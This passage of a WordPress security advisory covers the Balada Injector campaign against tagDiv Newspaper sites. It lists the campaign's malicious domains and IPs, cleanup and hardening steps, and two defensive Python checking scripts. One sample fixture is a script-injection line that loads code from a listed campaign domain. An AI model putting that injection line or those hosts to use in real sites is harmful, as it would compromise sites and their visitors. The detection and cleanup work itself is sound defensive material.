Here are the main Balada Injector domains and IP addresses observed during the month of September, 2023 — some of which were also used in attacks not directly related to the Newspaper theme.
Balada Injector Domains:
- decentralappps[.]com
- statisticscripts[.]com
- dataofpages[.]com
- listwithstats[.]com
- promsmotion[.]com
- stablelightway[.]com
- specialtaskevents[.]com
- getmygateway[.]com
- stratosbody[.]com
- specialnewspaper[.]com (note the Newspaper in the domain name)
For a short period of time, Balada Injector was hiding some of their servers behind a CloudFlare firewall, but their domains didn’t last long there. They inevitably had to go back to pointing the domains directly at their own servers.
Balada Injector Server IPs:
- 2.59.222.113
- 2.59.222.119
- 2.59.222.121
- 2.59.222.122
- 2.59.222.158
- 185.39.206.158
- 185.39.206.159
- 185.39.206.160
- 185.39.206.161
- 80.66.79.252
- 80.66.79.253
- 88.151.192.253
- 88.151.192.254
- 89.23.103.32
- 89.23.103.246
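The indicator list above is published in defanged form (`[.]` instead of `.`). The following script is an added example, not code from the original post: it refangs the listed domains and IPs and matches them against text such as web server access-log lines or the first line of a JavaScript file, treating any subdomain of a listed domain as a hit (the post notes that the campaign used multiple subdomains). The two log lines and the JavaScript snippet at the bottom are constructed sample data, not captured traffic.

```python
import ipaddress
import re

# Indicators exactly as listed in the post, still defanged.
BALADA_DOMAINS = [
    "decentralappps[.]com", "statisticscripts[.]com", "dataofpages[.]com",
    "listwithstats[.]com", "promsmotion[.]com", "stablelightway[.]com",
    "specialtaskevents[.]com", "getmygateway[.]com", "stratosbody[.]com",
    "specialnewspaper[.]com",
]
BALADA_IPS = [
    "2.59.222.113", "2.59.222.119", "2.59.222.121", "2.59.222.122", "2.59.222.158",
    "185.39.206.158", "185.39.206.159", "185.39.206.160", "185.39.206.161",
    "80.66.79.252", "80.66.79.253", "88.151.192.253", "88.151.192.254",
    "89.23.103.32", "89.23.103.246",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('example[.]com', 'hxxp://') back into its real form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


DOMAIN_SET = {refang(d) for d in BALADA_DOMAINS}
IP_SET = {ipaddress.ip_address(ip) for ip in BALADA_IPS}

# Hostname-like tokens (dot-separated labels ending in an alphabetic TLD) and dotted-quad IPv4 addresses.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_indicators(text: str) -> dict:
    """Return {'domains': [...], 'ips': [...]} for every listed indicator found in text.

    A subdomain such as cdn.stablelightway.com is reported as its listed parent domain.
    """
    domains, ips = set(), set()
    for host in HOST_RE.findall(text):
        host = host.lower()
        for listed in DOMAIN_SET:
            if host == listed or host.endswith("." + listed):
                domains.add(listed)
    for raw in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an address
            continue
        if ip in IP_SET:
            ips.add(str(ip))
    return {"domains": sorted(domains), "ips": sorted(ips)}


def scan_records(records):
    """Return (index, hits) for every record (log line, file head, ...) containing an indicator."""
    findings = []
    for i, rec in enumerate(records):
        hits = find_indicators(rec)
        if hits["domains"] or hits["ips"]:
            findings.append((i, hits))
    return findings


# Constructed sample data: two access-log lines and the first line of a .js file.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Sep/2023:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '2.59.222.119 - - [14/Sep/2023:10:02:03 +0000] "GET /wp-login.php HTTP/1.1" 200 12 "-" "python-requests/2.31"',
]
SAMPLE_JS_HEAD = (
    'var s=document.createElement("script");s.src="https://cdn.stablelightway.com/a.js";'
    "document.head.appendChild(s);\n/*! jQuery Migrate v3.4.1 */"
)

if __name__ == "__main__":
    for idx, hits in scan_records(SAMPLE_LOG + [SAMPLE_JS_HEAD]):
        print(f"record {idx}: {hits}")
```

The same `scan_records` call works on the lines of a real access log or on the first line of each `.js` file under `wp-includes/js/`, which is where the post says the secondary injections are placed.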
Mitigation steps
September, 2023 was one of the busiest months for Balada Injector malware. Our SiteCheck remote website scanner detected various types of Balada Injector on over 17,000 websites — almost twice the number of detections in the previous month of August. Over 9,000 of these detections were related to the Newspaper theme vulnerability.
We observed a rapid cycle of modifications to their injected scripts alongside new techniques and approaches. We saw randomized injections and obfuscation types, simultaneous use of multiple domains and subdomains, abuse of CloudFlare, and multiple approaches to attack administrators of infected WordPress sites.
September was also a very challenging month for thousands of users of the tagDiv Newspaper theme. The Balada Injector malware campaign performed a series of attacks targeting both the vulnerability in the tagDiv Composer plugin and blog administrators of already infected sites.
Our advice to users of the Newspaper theme is to follow these steps:
- Scan your site and remove all injected Balada malware. Our SiteCheck scanner detects most Balada Injector variations as malware.injection?35.*. If you continue with the following steps before completely removing the malware, it may reinfect your site while you are logged in as an administrator.
- Remove the initial injection, which can be found in the “td_live_css_local_storage” option in the wp_options table.
- Remove secondary injections, which can be found at the top of .js files like /wp-includes/js/jquery/jquery-migrate.min.js, /wp-includes/js/jquery/jquery.min.js and /wp-includes/js/wp-emoji-release.min.js.
- Check files like index.php, wp-blog-header.php and your theme’s header.php and footer.php files for injections. Remove any malicious code you find there.
- Make sure that the tagDiv Composer plugin is patched to at least version 4.2. This will help to prevent reinfections via the known security vulnerability.
- Keep your Newspaper theme updated with the latest patches. We’ve seen these injections on sites that use various versions of the Newspaper theme: 10.x, 11.x, 12.x. Some were as old as version 8.x.
- Make sure all other themes and plugins are up-to-date. This is a security best practice and will help protect your website from known vulnerabilities and software bugs.
- Remove all unwanted admin users. Check for any recently created admins, especially if their usernames are “greeceman” or end with “mann” and they use “@mail.com” emails.
- Make sure there are no unwanted plugins such as wp-zexit or wp-swamp installed on your site. Remember, by default such plugins hide themselves in the WordPress admin interface, so make sure to actually check what kind of plugins you have in the wp-content/plugins directory.
- Check the 404.php file of the Newspaper theme. There may be a backdoor there.
- Scan your entire website for backdoors. It’s not uncommon for Balada Injector and other attacks to use the initial backdoor to upload several other backdoors into random files. Integrity control systems may help you notice new and modified files.
- Change all of your website passwords, including the database password. Balada Injector is known for stealing information from wp-config.php files. Make sure all of your user credentials are strong, unique and secure to help prevent reinfection.
Now that you have seen how website malware can target WordPress admins to escalate a minor injection into a full site takeover, let’s revisit some security practices specifically for WordPress administrators.
- Even though WordPress admins can post articles, please use your admin account only for administrative tasks. Use more appropriate roles such as author, contributor and editor to create, edit, and post content instead.
- If you are logged in as a WordPress administrator, try not to browse your own website in the same browser before you log out. Balada Injector uses this scenario to make site admins further infect their own sites. If you need to test site pages, consider using a different browser or a private/incognito window of the same browser, where you will navigate without being identified as a site administrator.
- If you don’t normally edit theme and plugin files, please disable the theme and plugin editors in the WordPress admin interface.
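Several of the cleanup steps above (the injected `td_live_css_local_storage` option, unwanted admin accounts, self-hiding plugins) and the last hardening step (disabling the theme and plugin editors) can be turned into repeatable checks. The script below is an added example written for this page, not Sucuri's tooling or any WordPress API: it works on plain Python data that you would export from your own site (a user list, the directory names under `wp-content/plugins`, the plugin names the admin Plugins screen shows, a dump of `wp_options`, and the text of `wp-config.php`). The `DISALLOW_FILE_EDIT` constant is WordPress's documented switch for the file editors; the `<script` check on the option value is a heuristic added here; all sample data at the bottom is constructed.

```python
import re

# Names taken from the cleanup steps in the post.
UNWANTED_PLUGINS = {"wp-zexit", "wp-swamp"}
INITIAL_INJECTION_OPTION = "td_live_css_local_storage"


def suspicious_admins(users):
    """Flag administrator accounts matching the patterns the post describes.

    users: iterable of dicts with 'username', 'email' and 'role'.
    Returns a list of (username, reason) tuples.
    """
    flagged = []
    for u in users:
        if u["role"] != "administrator":
            continue
        name, email = u["username"].lower(), u["email"].lower()
        reasons = []
        if name == "greeceman":
            reasons.append("known attacker username")
        if name.endswith("mann"):
            reasons.append("username ends with 'mann'")
        if email.endswith("@mail.com"):
            reasons.append("uses an @mail.com address")
        if reasons:
            flagged.append((u["username"], "; ".join(reasons)))
    return flagged


def hidden_or_unwanted_plugins(plugin_dirs, admin_listing):
    """Compare what is on disk with what the admin Plugins screen displays.

    Self-hiding plugins remove themselves from the admin listing but stay on disk, so
    any directory that is absent from the listing, or is a known-bad name, is reported.
    """
    listed = set(admin_listing)
    return sorted(d for d in plugin_dirs if d in UNWANTED_PLUGINS or d not in listed)


def initial_injection_present(options):
    """options: dict option_name -> option_value (exported from wp_options).

    Heuristic (assumption, not from the post): a legitimate value of this tagDiv option holds
    CSS, so a <script tag inside it indicates the initial injection described above.
    """
    value = options.get(INITIAL_INJECTION_OPTION) or ""
    return "<script" in value.lower()


def file_editor_disabled(wp_config_text):
    """True when wp-config.php defines DISALLOW_FILE_EDIT as true."""
    pattern = r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)"
    return re.search(pattern, wp_config_text, re.IGNORECASE) is not None


def triage(users, plugin_dirs, admin_listing, options, wp_config_text):
    """Run every check and return one summary dict."""
    return {
        "suspicious_admins": suspicious_admins(users),
        "plugins_to_inspect": hidden_or_unwanted_plugins(plugin_dirs, admin_listing),
        "initial_injection": initial_injection_present(options),
        "file_editor_disabled": file_editor_disabled(wp_config_text),
    }


# Constructed sample data standing in for a real site's exports.
SAMPLE_USERS = [
    {"username": "editor_jane", "email": "jane@example.org", "role": "editor"},
    {"username": "siteowner", "email": "owner@example.org", "role": "administrator"},
    {"username": "greeceman", "email": "greeceman@mail.com", "role": "administrator"},
    {"username": "hoffmann", "email": "hoffmann@mail.com", "role": "administrator"},
]
SAMPLE_PLUGIN_DIRS = ["akismet", "classic-editor", "wp-zexit"]
SAMPLE_ADMIN_LISTING = ["akismet", "classic-editor"]
SAMPLE_OPTIONS = {
    "blogname": "Example Site",
    "td_live_css_local_storage": '<script src="https://placeholder.invalid/x.js"></script>',
}
SAMPLE_WP_CONFIG = "<?php\ndefine('DB_NAME', 'wp');\ndefine('DISALLOW_FILE_EDIT', true);\n"

if __name__ == "__main__":
    result = triage(SAMPLE_USERS, SAMPLE_PLUGIN_DIRS, SAMPLE_ADMIN_LISTING,
                    SAMPLE_OPTIONS, SAMPLE_WP_CONFIG)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run the checks again after cleanup: with the option cleared, the extra admins removed and the unwanted directories deleted, every finding should be empty and `file_editor_disabled` should be `True`.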